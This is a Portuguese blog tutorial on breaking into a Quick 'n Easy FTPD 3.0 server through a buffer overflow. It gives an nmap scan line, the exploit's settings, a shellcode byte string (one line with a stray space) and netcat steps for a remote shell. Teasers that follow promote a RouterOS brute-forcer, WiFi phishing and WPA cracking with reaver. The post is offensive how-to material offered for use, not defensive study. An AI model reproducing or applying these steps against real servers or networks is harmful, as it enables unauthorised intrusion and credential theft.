Pular para o conteúdo principal

Invadindo FTP Com Exploit



Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesma técnica para invadir Telnet, SSH entre outros.


A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.

Estarei já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.


Primeiro você deve identificar o serviço, versão, OS, entre outros. Você pode usar o nmap para isso usando a seguinte linha que gosto de usar:


nmap -v -sV -sC -O host


Para nosso caso, será encontrado um host com Quick 'n Easy FTPD 3.0, será necessario você ter acesso a algum usuario ou ftp anonimo, usando o -sC você saberá se o servidor tem acesso anonimo.

Veja o sistema operaciona.

Feito isso agora vamos usar o exploit em python.


http://www.securiteam.com/exploits/5WP0C2AJ5W.html


Aqui você deve configurar ele:

host = "127.0.0.1" // O Host que será explorado

port = 21 // A porta , por padrão 21

user = "h07" // O usuario, caso tenha acesso anonimo coloque "ftp"

password = "open" // Mesma coisa do usuario


Shellcode: No caso desse exploit será aberto a calculadora do windows, mais você pode estar alterando ele, pode encontrar shellcodes no site do metasploit ou então fazendo você mesmo.


http://www.metasploit.com/shellcode


shellcode = (

#bad chars: 0x00 0x0a 0x0d 0x5c 0x2f

#reconstruction PEB block

#mov dword edx, 0x7FFDF020 ;EDX <-- RtlEnterCriticalSection pointer

#mov dword [edx], 0x77F8AA4C ;RtlEnterCriticalSection pointer <-- original value

#...


"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"

"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\ xB9"

"\xad\xaa\x01\x78" #Address of system() function (2000 SP0 polish)

"\xFF\xD1\xEB\xF7")


Pronto, agora ele irá enviar "A" 267, para ocorrer o buffer overflow colocando a shellcode.


Caso você tenha escolhido uma shellcode de bind, antes de explorar você abre o netcat e digita : nc -vv -l -p (porta de bind) -n


Agora usa o exploit e você estará conectado na shell do sistema.


Obrigado, espero que tenham gostado. Me corrijam qualquer coisa.

Comentários

Postagens mais visitadas deste blog

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. Desenvolvedores: Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa Projeto:   github.com/mkbrutusproject/mkbrutus 01 Passo Verifique a versão atual do python em seguida realiza a instalação da versão 3 root@kali:~# python –version (Exibe a versão do Python) root@kali:~# apt-get install python3 (Realiza a instalação do Python 3) 02 Passo Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da ver...

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de...

Como Hackear WPA / WPA2 WIFI senha usando reaver em 1-2 horas

  Reaver é grande em rachar / WPA2 protegido senhas WPA e por força bruta os pinos WPS nos roteadores que possuem botão WPS / push ativado no-los, mas o problema é que existem milhares de pinos que tem para reaver força bruta e isso requer muito tempo hackear a senha. Mas eu comprei uma solução para você em que você vai ser capaz de quebrar a senha Wi-Fi em apenas 2-3 horas de tempo médio que tenho considerado. Qual é a lógica? A lógica é simples se você pode entender, Reaver atual versão da força bruta código PIN de 8 dígitos (código PIN WPS) e levou mais tempo em rachar o código PIN de 8 dígitos, mas se nós comandamos reaver a rachar de 4 dígitos de código pin na primeira sessão e o resto do código PIN de 4 dígitos na segunda sessão e, desta forma podemos quebrar a senha Wi-Fi facilmente em 2-3 horas e ainda menos, em seguida, na hora, como eu me rachou minha senha wi-fi em apenas 1 hora e meia. Comando! reaver -i mon0 -f -c "canal No...